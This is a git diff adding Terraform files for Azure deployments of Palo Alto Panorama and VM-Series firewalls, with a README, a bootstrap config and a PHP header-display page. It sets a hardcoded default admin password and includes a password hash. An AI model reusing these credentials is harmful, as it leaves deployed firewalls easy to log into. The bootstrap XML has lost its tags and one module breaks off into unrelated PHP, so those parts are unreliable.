+ value = "${azurerm_public_ip.panorama.ip_address}"
+}
\ No newline at end of file
diff --git a/azure/panorama_new_rg/panorama.tf b/azure/panorama_new_rg/panorama.tf
new file mode 100644
index 00000000..4443ca98
--- /dev/null
+++ b/azure/panorama_new_rg/panorama.tf
@@ -0,0 +1,51 @@
+#### CREATE Panorama
+
+resource "azurerm_virtual_machine" "panorama" {
+ name = "${var.virtualMachineName}"
+ location = "${azurerm_resource_group.resourcegroup.location}"
+ resource_group_name = "${azurerm_resource_group.resourcegroup.name}"
+ network_interface_ids = ["${azurerm_network_interface.panorama.id}"]
+
+ primary_network_interface_id = "${azurerm_network_interface.panorama.id}"
+ vm_size = "${var.virtualMachineSize}"
+
+ plan {
+ name = "byol"
+ publisher = "paloaltonetworks"
+ product = "panorama"
+ }
+
+ storage_image_reference {
+ publisher = "paloaltonetworks"
+ offer = "panorama"
+ sku = "byol"
+ version = "${var.panoramaVersion}"
+ }
+
+ storage_os_disk {
+ name = "${var.virtualMachineName}"
+ caching = "ReadWrite"
+ create_option = "FromImage"
+ managed_disk_type = "StandardSSD_LRS"
+ }
+
+ delete_os_disk_on_termination = true
+ delete_data_disks_on_termination = true
+
+ os_profile {
+ computer_name = "${var.virtualMachineName}"
+ admin_username = "${var.adminUsername}"
+ admin_password = "${var.adminPassword}"
+ }
+
+ os_profile_linux_config {
+ disable_password_authentication = false
+ }
+ boot_diagnostics {
+ enabled = "true"
+ storage_uri = "${azurerm_storage_account.mystorageaccount.primary_blob_endpoint}"
+ }
+}
\ No newline at end of file
diff --git a/azure/panorama_new_rg/public-ips.tf b/azure/panorama_new_rg/public-ips.tf
new file mode 100644
index 00000000..09c1a7fc
--- /dev/null
+++ b/azure/panorama_new_rg/public-ips.tf
@@ -0,0 +1,7 @@
+#### CREATE PUBLIC IP ADDRESSES ####
+resource "azurerm_public_ip" panorama {
+ name = "${var.publicIpAddressName}"
+ location = "${azurerm_resource_group.resourcegroup.location}"
+ resource_group_name = "${azurerm_resource_group.resourcegroup.name}"
+ allocation_method = "Static"
+}
\ No newline at end of file
diff --git a/azure/panorama_new_rg/resource-group.tf b/azure/panorama_new_rg/resource-group.tf
new file mode 100644
index 00000000..bb71e2a6
--- /dev/null
+++ b/azure/panorama_new_rg/resource-group.tf
@@ -0,0 +1,10 @@
+//# ********** RESOURCE GROUP **********
+//# Configure the Providers
+provider "azurerm" {}
+provider "random" {}
+
+//# Create a resource group
+resource "azurerm_resource_group" "resourcegroup" {
+ name = "${var.virtualMachineRG}"
+ location = "${var.Location}"
+}
\ No newline at end of file
diff --git a/azure/panorama_new_rg/route-tables.tf b/azure/panorama_new_rg/route-tables.tf
new file mode 100644
index 00000000..5d33ffa5
--- /dev/null
+++ b/azure/panorama_new_rg/route-tables.tf
@@ -0,0 +1,17 @@
+#### CREATE THE ROUTE TABLES ####
+
+resource "azurerm_route_table" "panorama" {
+ name = "panorama"
+ location = "${azurerm_resource_group.resourcegroup.location}"
+ resource_group_name = "${azurerm_resource_group.resourcegroup.name}"
+ route {
+ name = "internet"
+ address_prefix = "0.0.0.0/0"
+ next_hop_type = "internet"
+ }
+}
+
+resource "azurerm_subnet_route_table_association" "panorama" {
+ subnet_id = "${azurerm_subnet.panorama.id}"
+ route_table_id = "${azurerm_route_table.panorama.id}"
+}
\ No newline at end of file
diff --git a/azure/panorama_new_rg/storage-account.tf b/azure/panorama_new_rg/storage-account.tf
new file mode 100644
index 00000000..a3034ff1
--- /dev/null
+++ b/azure/panorama_new_rg/storage-account.tf
@@ -0,0 +1,11 @@
+# Storage account for boot diagnostics
+resource "random_id" "storage_account" {
+ byte_length = 4
+}
+resource "azurerm_storage_account" "mystorageaccount" {
+ name = "${var.diagnosticsStorageAccountName}${lower(random_id.storage_account.hex)}"
+ location = "${azurerm_resource_group.resourcegroup.location}"
+ resource_group_name = "${azurerm_resource_group.resourcegroup.name}"
+ account_tier = "${var.diagnosticsStorageAccountTier}"
+ account_replication_type = "${var.diagnosticsStorageAccountReplication}"
+}
\ No newline at end of file
diff --git a/azure/panorama_new_rg/terraform.tfvars.sample b/azure/panorama_new_rg/terraform.tfvars.sample
new file mode 100644
index 00000000..7ce8eb6e
--- /dev/null
+++ b/azure/panorama_new_rg/terraform.tfvars.sample
@@ -0,0 +1,33 @@
+virtualMachineRG = ""
+
+Location = ""
+
+virtualNetworkName = ""
+
+addressPrefix = ""
+
+subnetName = ""
+
+subnet = ""
+
+publicIpAddressName = ""
+
+networkInterfaceName = ""
+
+networkSecurityGroupName = ""
+
+diagnosticsStorageAccountName = ""
+
+diagnosticsStorageAccountTier = ""
+
+diagnosticsStorageAccountReplication = ""
+
+virtualMachineName = ""
+
+virtualMachineSize = ""
+
+panoramaVersion = ""
+
+adminUsername = ""
+
+adminPassword = ""
\ No newline at end of file
diff --git a/azure/panorama_new_rg/variables.tf b/azure/panorama_new_rg/variables.tf
new file mode 100644
index 00000000..9456111b
--- /dev/null
+++ b/azure/panorama_new_rg/variables.tf
@@ -0,0 +1,68 @@
+variable "virtualMachineRG" {
+ description = "Virtual Machine RG"
+ default = "pglynn-test"
+}
+variable "Location" {
+ description = "Location"
+ default = "centralus"
+}
+variable "virtualNetworkName" {
+ description = "Virtual Network Name"
+ default = "panorama"
+}
+variable "addressPrefix" {
+ description = "Address Prefix"
+ default = "10.0.0.0/24"
+}
+variable "subnetName" {
+ description = "Subnet Name"
+ default = "panorama"
+}
+variable "subnet" {
+ description = "Subnet"
+ default = "10.0.0.0/24"
+}
+variable "publicIpAddressName" {
+ description = "Public Ip Address Name"
+ default = "panorama"
+}
+variable "networkInterfaceName" {
+ description = "Network Interface Name"
+ default = "panorama"
+}
+variable "networkSecurityGroupName" {
+ description = "Network Security Group Name"
+ default = "panorama"
+}
+variable "diagnosticsStorageAccountName" {
+ description = "Diagnostics Storage Account Name"
+ default = "panorama"
+}
+variable "diagnosticsStorageAccountTier" {
+ description = "Diagnostics Storage Account Tier"
+ default = "Standard"
+}
+variable "diagnosticsStorageAccountReplication" {
+ description = "Diagnostics Storage Account Replication"
+ default = "LRS"
+}
+variable "virtualMachineName" {
+ description = "Virtual Machine Name"
+ default = "panorama"
+}
+variable "virtualMachineSize" {
+ description = "Virtual Machine Size"
+ default = "Standard_D3"
+}
+variable "panoramaVersion" {
+ description = "Panorama Version"
+ default = "8.1.2"
+}
+variable "adminUsername" {
+ description = "Admin Username"
+ default = "panadmin"
+}
+variable "adminPassword" {
+ description = "Admin Password"
+ default = "Pal0Alt0@123"
+}
\ No newline at end of file
diff --git a/azure/panorama_new_rg/vnet-subnets.tf b/azure/panorama_new_rg/vnet-subnets.tf
new file mode 100644
index 00000000..fba7b3cf
--- /dev/null
+++ b/azure/panorama_new_rg/vnet-subnets.tf
@@ -0,0 +1,18 @@
+# ********** VNET **********
+
+# Create a virtual network
+resource "azurerm_virtual_network" "vnet" {
+ name = "${var.virtualNetworkName}"
+ address_space = ["${var.addressPrefix}"]
+ location = "${azurerm_resource_group.resourcegroup.location}"
+ resource_group_name = "${azurerm_resource_group.resourcegroup.name}"
+}
+
+# Create the subnet
+
+resource "azurerm_subnet" "panorama" {
+ name = "${var.subnetName}"
+ resource_group_name = "${azurerm_resource_group.resourcegroup.name}"
+ virtual_network_name = "${azurerm_virtual_network.vnet.name}"
+ address_prefix = "${var.subnet}"
+}
\ No newline at end of file
diff --git a/azure/transit_2fw_2spoke_common/GUIDE.pdf b/azure/transit_2fw_2spoke_common/GUIDE.pdf
new file mode 100644
index 00000000..c66ebfe6
Binary files /dev/null and b/azure/transit_2fw_2spoke_common/GUIDE.pdf differ
diff --git a/azure/transit_2fw_2spoke_common/README.md b/azure/transit_2fw_2spoke_common/README.md
new file mode 100644
index 00000000..4c19611a
--- /dev/null
+++ b/azure/transit_2fw_2spoke_common/README.md
@@ -0,0 +1,60 @@
+# 2 x VM-Series / Public LB / Internal LB / 2 x Spoke VNETs
+
+Terraform creates 2 VM-Series firewalls deployed in a transit VNET with two connected spoke VNETs (via VNET peering). The VM-Series firewalls secure all ingress/egress to and from the spoke VNETs. All traffic originating from the spokes is routed to an internal load balancer in the transit VNET's trust subnet. All inbound traffic from the internet is sent through a public load balancer.
+
+Please see the [**Deployment Guide**](https://github.com/wwce/terraform/blob/master/azure/transit_2fw_2spoke_common/GUIDE.pdf) for more information.
+
+
+
+
+
+
+
+## Prerequisites
+* Valid Azure Subscription
+* Access to Azure Cloud Shell
+
+
+
+## How to Deploy
+### 1. Setup & Download Build
+In the Azure Portal, open Azure Cloud Shell and run the following commands (**BASH ONLY!**):
+```
+# Accept VM-Series EULA for desired license type (BYOL, Bundle1, or Bundle2)
+$ az vm image terms accept --urn paloaltonetworks:vmseries1:<byol|bundle1|bundle2>:9.0.1
+
+# Download repo & change directories to the Terraform build
+$ git clone https://github.com/wwce/terraform; cd terraform/azure/transit_2fw_2spoke_common
+```
+
+### 2. Edit terraform.tfvars
+Open terraform.tfvars and uncomment one value for fw_license that matches your license type from step 1.
+
+```
+$ vi terraform.tfvars
+```
+
+
+Your terraform.tfvars should look like this before proceeding
+
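+For example, with BYOL licensing the top of your terraform.tfvars would contain (illustrative snippet; only the fw_license lines change):
+
+```
+fw_license = "byol"
+#fw_license = "bundle1"
+#fw_license = "bundle2"
+```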
+
+
+### 3. Deploy Build
+```
+$ terraform init
+$ terraform apply
+```
+
+
+
+## How to Destroy
+Run the following to destroy the build.
+```
+$ terraform destroy
+```
+
+
+
+## Support Policy
+The guide in this directory and accompanied files are released under an as-is, best effort, support policy. These scripts should be seen as community supported and Palo Alto Networks will contribute our expertise as and when possible. We do not provide technical support or help in using or troubleshooting the components of the project through our normal support options such as Palo Alto Networks support teams, or ASC (Authorized Support Centers) partners and backline support options. The underlying product used (the VM-Series firewall) by the scripts or templates are still supported, but the support is only for the product functionality and not for help in deploying or using the template or script itself.
+Unless explicitly tagged, all projects or work posted in our GitHub repository (at https://github.com/PaloAltoNetworks) or sites other than our official Downloads page on https://support.paloaltonetworks.com are provided under the best effort policy.
diff --git a/azure/transit_2fw_2spoke_common/bootstrap_files/config/bootstrap.xml b/azure/transit_2fw_2spoke_common/bootstrap_files/config/bootstrap.xml
new file mode 100644
index 00000000..47185aa0
--- /dev/null
+++ b/azure/transit_2fw_2spoke_common/bootstrap_files/config/bootstrap.xml
@@ -0,0 +1,1058 @@
+
+
+
+
+
+
+
+
+ yes
+ no
+ yes
+ no
+
+
+ updates.paloaltonetworks.com
+
+
+
+
+ wednesday
+ 01:02
+ download-only
+
+
+
+
+ US/Pacific
+
+ yes
+ yes
+
+
+
+ 8.8.8.8
+ 4.2.2.2
+
+
+ fw1
+
+
+
+ yes
+
+
+ FQDN
+
+ fw1
+ paloalto
+
+
+ yes
+ no
+ yes
+ no
+
+
+ 8.8.8.8
+ 4.2.2.2
+
+
+
+ yes
+
+
+
+
+
+
+
+
+
+ no
+
+ allow-health-probe
+
+ no
+
+
+ yes
+ no
+
+
+
+
+
+
+
+ no
+
+ allow-health-probe
+
+ no
+
+
+ yes
+ no
+
+
+
+
+
+
+
+
+
+ 3
+ 5
+ wait-recover
+
+
+
+
+ no
+ no
+ yes
+ no
+ no
+ no
+ no
+ no
+ no
+ no
+ no
+
+
+
+
+
+
+
+
+
+
+
+ aes-128-cbc
+ 3des
+
+
+ sha1
+
+
+ group2
+
+
+ 8
+
+
+
+
+ aes-128-cbc
+
+
+ sha256
+
+
+ group19
+
+
+ 8
+
+
+
+
+ aes-256-cbc
+
+
+ sha384
+
+
+ group20
+
+
+ 8
+
+
+
+
+
+
+
+ aes-128-cbc
+ 3des
+
+
+ sha1
+
+
+ group2
+
+ 1
+
+
+
+
+
+ aes-128-gcm
+
+
+ none
+
+
+ group19
+
+ 1
+
+
+
+
+
+ aes-256-gcm
+
+
+ none
+
+
+ group20
+
+ 1
+
+
+
+
+
+
+ aes-128-cbc
+
+
+ sha1
+
+
+
+
+
+
+
+
+
+
+ real-time
+
+
+ high
+
+
+ high
+
+
+ medium
+
+
+ medium
+
+
+ low
+
+
+ low
+
+
+ low
+
+
+
+
+
+
+
+
+
+ no
+
+
+ 1.25
+ 0.5
+ 900
+ 300
+ 900
+ yes
+
+
+
+
+ yes
+
+
+
+
+ no
+
+
+ no
+
+
+ no
+
+
+
+ ethernet1/1
+
+
+ 10
+ 10
+ 30
+ 110
+ 30
+ 110
+ 200
+ 20
+ 120
+
+
+
+
+
+
+ 10.0.1.1
+
+
+ None
+
+
+ no
+ any
+ 2
+
+ ethernet1/1
+ 10
+ 0.0.0.0/0
+
+
+
+
+
+
+ trust-vr
+
+
+ None
+
+
+ no
+ any
+ 2
+
+ 10
+ 10.1.0.0/16
+
+
+
+
+
+
+ trust-vr
+
+
+ None
+
+
+ no
+ any
+ 2
+
+ 10
+ 10.2.0.0/16
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ ethernet1/2
+
+
+ 10
+ 10
+ 30
+ 110
+ 30
+ 110
+ 200
+ 20
+ 120
+
+
+
+
+
+
+ 10.0.2.1
+
+
+ None
+
+
+ no
+ any
+ 2
+
+ ethernet1/2
+ 10
+ 168.63.129.16/32
+
+
+
+
+
+
+ untrust-vr
+
+
+ None
+
+
+ no
+ any
+ 2
+
+ 10
+ 0.0.0.0/0
+
+
+
+
+
+
+ 10.0.2.1
+
+
+ None
+
+
+ no
+ any
+ 2
+
+ ethernet1/2
+ 10
+ 10.1.0.0/16
+
+
+
+
+
+
+ 10.0.2.1
+
+
+ None
+
+
+ no
+ any
+ 2
+
+ ethernet1/2
+ 10
+ 10.2.0.0/16
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ yes
+
+
+ no
+
+
+ no
+
+
+ no
+
+
+ no
+
+
+
+
+
+
+
+
+
+
+
+ ethernet1/2
+
+
+ no
+
+
+
+
+ ethernet1/1
+
+
+ no
+
+
+
+
+
+ ethernet1/2
+ ethernet1/1
+ vlan
+ loopback
+ tunnel
+
+
+
+ untrust-vr
+ trust-vr
+
+
+
+
+
+
+
+
+
+
+ 22
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ any
+
+
+ any
+
+
+
+ any
+
+
+ any
+
+
+ any
+
+
+ any
+
+
+ any
+
+
+ any
+
+ allow
+
+
+
+ trust
+
+
+ untrust
+
+
+
+ any
+
+
+ any
+
+
+ any
+
+
+ web-browsing
+
+
+ application-default
+
+
+ any
+
+ allow
+
+
+
+ trust
+
+
+ untrust
+
+
+
+ any
+
+
+ any
+
+
+ any
+
+
+ ssh
+
+
+ application-default
+
+
+ any
+
+ allow
+
+
+ universal
+
+ trust
+
+
+ trust
+
+
+ no
+
+ any
+
+
+ any
+
+
+ spoke1-vnet
+ spoke2-vnet
+
+ no
+
+ ping
+ ssh
+ web-browsing
+
+
+ application-default
+
+
+ any
+
+ allow
+ no
+ yes
+ no
+ no
+
+
+
+ universal
+
+ trust
+
+
+ untrust
+
+
+ no
+
+ any
+
+
+ any
+
+
+ any
+
+ no
+
+ apt-get
+ ntp
+ ping
+ ssl
+ web-browsing
+
+
+ application-default
+
+
+ any
+
+ allow
+ no
+ yes
+ no
+ no
+
+
+
+
+
+
+
+ deny
+ no
+ yes
+
+
+ deny
+ no
+ yes
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ ipv4
+
+ untrust
+
+
+ untrust
+
+ any
+ any
+
+
+ any
+
+ no
+ This NAT policy prevents the public load balancer's health probes from being NATed.
+
+
+ ipv4
+
+ untrust
+
+
+ untrust
+
+ ethernet1/1
+ service-http
+
+
+ any
+
+ no
+
+
+
+ ethernet1/2
+
+
+
+
+ spoke1-intlb
+ 80
+
+ NATs inbound request to internal LB in spoke1
+
+
+ ipv4
+
+ untrust
+
+
+ untrust
+
+ ethernet1/1
+ tcp-22
+
+
+ any
+
+ no
+
+
+
+ ethernet1/2
+
+
+
+
+ spoke2-vm
+ 22
+
+ NATs inbound request to jump server in Spoke 2.
+
+
+ ipv4
+
+ trust
+
+
+ untrust
+
+ any
+ any
+
+
+ any
+
+
+
+
+ ethernet1/1
+
+
+
+ no
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ 168.63.129.16/32
+
+ azure-resource
+
+
+
+ 10.1.0.4
+
+ azure-resource
+
+
+
+ 10.2.0.4
+
+ azure-resource
+
+
+
+ 10.1.0.0/16
+
+ azure-resource
+
+
+
+ 10.2.0.0/16
+
+ azure-resource
+
+
+
+ 10.1.0.100
+
+ azure-resource
+
+
+
+
+
+
+
+
+
+
+
+
+ color20
+
+
+ color13
+
+
+ color24
+
+
+ color22
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ *
+
+
+ yes
+
+
+
+
+ $1$uoktdfcd$ETFyCMQoc9Atk1GyysHYU1
+
+
+ yes
+
+
+
+
+
+ yes
+ 8
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ yes
+ 5
+
+
+ yes
+ 5
+
+
+ yes
+ 5
+
+
+ yes
+ 10
+
+
+ yes
+ 5
+
+
+
+ yes
+
+
+
+ 10
+ 10
+
+ 100
+ 50
+
+
+
+ 10
+ 10
+
+ 100
+ 50
+
+
+
+
+
+ 100
+ yes
+
+
+
+
+
+
+
diff --git a/gcp/gcp-terraform-mclimans/demo_deployments/two_tier/bootstrap/init-cfg.txt b/azure/transit_2fw_2spoke_common/bootstrap_files/config/init-cfg.txt
similarity index 80%
rename from gcp/gcp-terraform-mclimans/demo_deployments/two_tier/bootstrap/init-cfg.txt
rename to azure/transit_2fw_2spoke_common/bootstrap_files/config/init-cfg.txt
index 840154aa..44878949 100644
--- a/gcp/gcp-terraform-mclimans/demo_deployments/two_tier/bootstrap/init-cfg.txt
+++ b/azure/transit_2fw_2spoke_common/bootstrap_files/config/init-cfg.txt
@@ -4,6 +4,6 @@ default-gateway=
netmask=
ipv6-address=
ipv6-default-gateway=
-hostname=vm-series
+dhcp-accept-server-hostname=yes
dns-primary=8.8.8.8
dns-secondary=4.2.2.2
\ No newline at end of file
diff --git a/azure/transit_2fw_2spoke_common/bootstrap_files/content/.gitignore b/azure/transit_2fw_2spoke_common/bootstrap_files/content/.gitignore
new file mode 100644
index 00000000..c96a04f0
--- /dev/null
+++ b/azure/transit_2fw_2spoke_common/bootstrap_files/content/.gitignore
@@ -0,0 +1,2 @@
+*
+!.gitignore
\ No newline at end of file
diff --git a/azure/transit_2fw_2spoke_common/bootstrap_files/license/authcodes b/azure/transit_2fw_2spoke_common/bootstrap_files/license/authcodes
new file mode 100644
index 00000000..e69de29b
diff --git a/azure/transit_2fw_2spoke_common/bootstrap_files/software/.gitignore b/azure/transit_2fw_2spoke_common/bootstrap_files/software/.gitignore
new file mode 100644
index 00000000..c96a04f0
--- /dev/null
+++ b/azure/transit_2fw_2spoke_common/bootstrap_files/software/.gitignore
@@ -0,0 +1,2 @@
+*
+!.gitignore
\ No newline at end of file
diff --git a/azure/transit_2fw_2spoke_common/fw_common.tf b/azure/transit_2fw_2spoke_common/fw_common.tf
new file mode 100644
index 00000000..2f261ad5
--- /dev/null
+++ b/azure/transit_2fw_2spoke_common/fw_common.tf
@@ -0,0 +1,121 @@
+#-----------------------------------------------------------------------------------------------------------------
+# Create resource group for FWs, FW NICs, and FW LBs
+
+resource "azurerm_resource_group" "common_fw" {
+ name = "${var.global_prefix}${var.fw_prefix}-rg"
+ location = var.location
+}
+
+#-----------------------------------------------------------------------------------------------------------------
+# Create storage account and file share for bootstrapping
+
+resource "random_string" "main" {
+ length = 15
+ min_lower = 5
+ min_numeric = 10
+ special = false
+}
+
+resource "azurerm_storage_account" "main" {
+ name = random_string.main.result
+ account_tier = "Standard"
+ account_replication_type = "LRS"
+ location = azurerm_resource_group.common_fw.location
+ resource_group_name = azurerm_resource_group.common_fw.name
+}
+
+module "common_fileshare" {
+ source = "./modules/azure_bootstrap/"
+ name = "${var.fw_prefix}-bootstrap"
+ quota = 1
+ storage_account_name = azurerm_storage_account.main.name
+ storage_account_key = azurerm_storage_account.main.primary_access_key
+ local_file_path = "bootstrap_files/"
+}
+
+
+#-----------------------------------------------------------------------------------------------------------------
+# Create VM-Series. The number of VM-Series instances deployed is controlled by var.fw_count.
+
+module "common_fw" {
+ source = "./modules/vmseries/"
+ name = "${var.fw_prefix}-vm"
+ vm_count = var.fw_count
+ username = var.fw_username
+ password = var.fw_password
+ panos = var.fw_panos
+ license = var.fw_license
+ nsg_prefix = var.fw_nsg_prefix
+ avset_name = "${var.fw_prefix}-avset"
+ subnet_mgmt = module.vnet.vnet_subnets[0]
+ subnet_untrust = module.vnet.vnet_subnets[1]
+ subnet_trust = module.vnet.vnet_subnets[2]
+ nic0_public_ip = true
+ nic1_public_ip = true
+ nic2_public_ip = false
+ nic1_backend_pool_ids = [module.common_extlb.backend_pool_id]
+ nic2_backend_pool_ids = [module.common_intlb.backend_pool_id]
+ bootstrap_storage_account = azurerm_storage_account.main.name
+ bootstrap_access_key = azurerm_storage_account.main.primary_access_key
+ bootstrap_file_share = module.common_fileshare.file_share_name
+ bootstrap_share_directory = "None"
+ location = var.location
+ resource_group_name = azurerm_resource_group.common_fw.name
+
+ dependencies = [
+ module.common_fileshare.completion
+ ]
+}
+
+#-----------------------------------------------------------------------------------------------------------------
+# Create public load balancer. Load balancer uses firewall's untrust interfaces as its backend pool.
+
+module "common_extlb" {
+ source = "./modules/lb/"
+ name = "${var.fw_prefix}-public-lb"
+ type = "public"
+ sku = "Standard"
+ probe_ports = [22]
+ frontend_ports = [80, 22, 443]
+ backend_ports = [80, 22, 443]
+ protocol = "Tcp"
+ location = var.location
+ resource_group_name = azurerm_resource_group.common_fw.name
+}
+
+#-----------------------------------------------------------------------------------------------------------------
+# Create internal load balancer. Load balancer uses firewall's trust interfaces as its backend pool
+
+module "common_intlb" {
+ source = "./modules/lb/"
+ name = "${var.fw_prefix}-internal-lb"
+ type = "private"
+ sku = "Standard"
+ probe_ports = [22]
+ frontend_ports = [0]
+ backend_ports = [0]
+ protocol = "All"
+ subnet_id = module.vnet.vnet_subnets[2]
+ private_ip_address = var.fw_internal_lb_ip
+ location = var.location
+ resource_group_name = azurerm_resource_group.common_fw.name
+}
+
+#-----------------------------------------------------------------------------------------------------------------
+# Outputs to terminal
+
+output EXT-LB {
+ value = "http://${module.common_extlb.public_ip[0]}"
+}
+
+output MGMT-FW1 {
+ value = "https://${module.common_fw.nic0_public_ip[0]}"
+}
+
+output MGMT-FW2 {
+ value = "https://${module.common_fw.nic0_public_ip[1]}"
+}
+
+output SSH-TO-SPOKE2 {
+ value = "ssh ${var.spoke_username}@${module.common_extlb.public_ip[0]}"
+}
diff --git a/azure/transit_2fw_2spoke_common/fw_vnet.tf b/azure/transit_2fw_2spoke_common/fw_vnet.tf
new file mode 100644
index 00000000..826b7152
--- /dev/null
+++ b/azure/transit_2fw_2spoke_common/fw_vnet.tf
@@ -0,0 +1,16 @@
+#-----------------------------------------------------------------------------------------------------------------
+# Create Transit VNET
+resource "azurerm_resource_group" "transit" {
+ name = "${var.global_prefix}${var.transit_prefix}-rg"
+ location = var.location
+}
+
+module "vnet" {
+ source = "./modules/vnet/"
+ name = "${var.transit_prefix}-vnet"
+ address_space = var.transit_vnet_cidr
+ subnet_names = var.transit_subnet_names
+ subnet_prefixes = var.transit_subnet_cidrs
+ location = var.location
+ resource_group_name = azurerm_resource_group.transit.name
+}
diff --git a/azure/transit_2fw_2spoke_common/images/diagram.png b/azure/transit_2fw_2spoke_common/images/diagram.png
new file mode 100644
index 00000000..45f1d146
Binary files /dev/null and b/azure/transit_2fw_2spoke_common/images/diagram.png differ
diff --git a/azure/transit_2fw_2spoke_common/images/tfvars.png b/azure/transit_2fw_2spoke_common/images/tfvars.png
new file mode 100644
index 00000000..afd57343
Binary files /dev/null and b/azure/transit_2fw_2spoke_common/images/tfvars.png differ
diff --git a/azure/transit_2fw_2spoke_common/modules/azure_bootstrap/main.tf b/azure/transit_2fw_2spoke_common/modules/azure_bootstrap/main.tf
new file mode 100644
index 00000000..1a5c1f7a
--- /dev/null
+++ b/azure/transit_2fw_2spoke_common/modules/azure_bootstrap/main.tf
@@ -0,0 +1,40 @@
+
+
+resource "random_string" "randomstring" {
+ length = 15
+ min_lower = 5
+ min_numeric = 10
+ special = false
+}
+
+resource "azurerm_storage_share" "main" {
+ name = "${var.name}${random_string.randomstring.result}"
+ storage_account_name = var.storage_account_name
+ quota = var.quota
+}
+
+resource "null_resource" "upload" {
+provisioner "local-exec" {
+ command = <
+ SOURCE & DESTINATION ADDRESSES
+ ';
+echo ''. "INTERVAL" .': '. $time .' ';
+$localIPAddress = getHostByName(getHostName());
+$sourceIPAddress = getRealIpAddr();
+echo ''. "SOURCE IP" .': '. $sourceIPAddress .' ';
+echo ''. "LOCAL IP" .': '. $localIPAddress .' ';
+
+$vm_name = gethostname();
+echo ''. "VM NAME" .': '. $vm_name .' ';
+echo ''. ' ';
+echo '
+ HEADER INFORMATION
+ ';
+/* All $_SERVER variables prefixed with HTTP_ are the HTTP headers */
+foreach ($_SERVER as $header => $value) {
+ if (substr($header, 0, 5) == 'HTTP_') {
+ /* Strip the HTTP_ prefix from the $_SERVER variable, what remains is the header */
+ $clean_header = strtolower(substr($header, 5, strlen($header)));
+
+ /* Replace underscores by the dashes, as the browser sends them */
+ $clean_header = str_replace('_', '-', $clean_header);
+
+ /* Cleanup: standard headers are first-letter uppercase */
+ $clean_header = ucwords($clean_header, " \t\r\n\f\v-");
+
+ /* And show'm */
+ echo ''. $header .': '. $value .' ';
+ }
+}
+?>
diff --git a/azure/transit_2fw_2spoke_common/scripts/web_startup.yml.tpl b/azure/transit_2fw_2spoke_common/scripts/web_startup.yml.tpl
new file mode 100644
index 00000000..1d02e945
--- /dev/null
+++ b/azure/transit_2fw_2spoke_common/scripts/web_startup.yml.tpl
@@ -0,0 +1,10 @@
+#cloud-config
+
+runcmd:
+ - sudo apt-get update -y
+ - sudo apt-get install -y php
+ - sudo apt-get install -y apache2
+ - sudo apt-get install -y libapache2-mod-php
+ - sudo rm -f /var/www/html/index.html
+ - sudo wget -O /var/www/html/index.php https://raw.githubusercontent.com/wwce/terraform/master/azure/transit_2fw_2spoke_common/scripts/showheaders.php
+ - sudo systemctl restart apache2
\ No newline at end of file
diff --git a/azure/transit_2fw_2spoke_common/spokes.tf b/azure/transit_2fw_2spoke_common/spokes.tf
new file mode 100644
index 00000000..ea6ab06c
--- /dev/null
+++ b/azure/transit_2fw_2spoke_common/spokes.tf
@@ -0,0 +1,97 @@
+#-----------------------------------------------------------------------------------------------------------------
+# Create spoke1 resource group, spoke1 VNET, spoke1 internal LB, (2) spoke1 VMs
+
+resource "azurerm_resource_group" "spoke1_rg" {
+ name = "${var.global_prefix}${var.spoke1_prefix}-rg"
+ location = var.location
+}
+
+module "spoke1_vnet" {
+ source = "./modules/spoke_vnet/"
+ name = "${var.spoke1_prefix}-vnet"
+ address_space = var.spoke1_vnet_cidr
+ subnet_prefixes = var.spoke1_subnet_cidrs
+ remote_vnet_rg = azurerm_resource_group.transit.name
+ remote_vnet_name = module.vnet.vnet_name
+ remote_vnet_id = module.vnet.vnet_id
+ route_table_destinations = var.spoke_udrs
+ route_table_next_hop = [var.fw_internal_lb_ip]
+ location = var.location
+ resource_group_name = azurerm_resource_group.spoke1_rg.name
+}
+
+data "template_file" "web_startup" {
+ template = "${file("${path.module}/scripts/web_startup.yml.tpl")}"
+}
+
+module "spoke1_vm" {
+ source = "./modules/spoke_vm/"
+ name = "${var.spoke1_prefix}-vm"
+ vm_count = var.spoke1_vm_count
+ subnet_id = module.spoke1_vnet.vnet_subnets[0]
+ availability_set_id = ""
+ backend_pool_ids = [module.spoke1_lb.backend_pool_id]
+ custom_data = base64encode(data.template_file.web_startup.rendered)
+ publisher = "Canonical"
+ offer = "UbuntuServer"
+ sku = "16.04-LTS"
+ username = var.spoke_username
+ password = var.spoke_password
+ tags = var.tags
+ location = var.location
+ resource_group_name = azurerm_resource_group.spoke1_rg.name
+}
+
+module "spoke1_lb" {
+ source = "./modules/lb/"
+ name = "${var.spoke1_prefix}-lb"
+ type = "private"
+ sku = "Standard"
+ probe_ports = [80]
+ frontend_ports = [80]
+ backend_ports = [80]
+ protocol = "Tcp"
+ enable_floating_ip = false
+ subnet_id = module.spoke1_vnet.vnet_subnets[0]
+ private_ip_address = var.spoke1_internal_lb_ip
+ location = var.location
+ resource_group_name = azurerm_resource_group.spoke1_rg.name
+}
+
+#-----------------------------------------------------------------------------------------------------------------
+# Create spoke2 resource group, spoke2 VNET, spoke2 VM
+
+resource "azurerm_resource_group" "spoke2_rg" {
+ name = "${var.global_prefix}${var.spoke2_prefix}-rg"
+ location = var.location
+}
+
+module "spoke2_vnet" {
+ source = "./modules/spoke_vnet/"
+ name = "${var.spoke2_prefix}-vnet"
+ address_space = var.spoke2_vnet_cidr
+ subnet_prefixes = var.spoke2_subnet_cidrs
+ remote_vnet_rg = azurerm_resource_group.transit.name
+ remote_vnet_name = module.vnet.vnet_name
+ remote_vnet_id = module.vnet.vnet_id
+ route_table_destinations = var.spoke_udrs
+ route_table_next_hop = [var.fw_internal_lb_ip]
+ location = var.location
+ resource_group_name = azurerm_resource_group.spoke2_rg.name
+}
+
+module "spoke2_vm" {
+ source = "./modules/spoke_vm/"
+ name = "${var.spoke2_prefix}-vm"
+ vm_count = var.spoke2_vm_count
+ subnet_id = module.spoke2_vnet.vnet_subnets[0]
+ availability_set_id = ""
+ publisher = "Canonical"
+ offer = "UbuntuServer"
+ sku = "16.04-LTS"
+ username = var.spoke_username
+ password = var.spoke_password
+ tags = var.tags
+ location = var.location
+ resource_group_name = azurerm_resource_group.spoke2_rg.name
+}
\ No newline at end of file
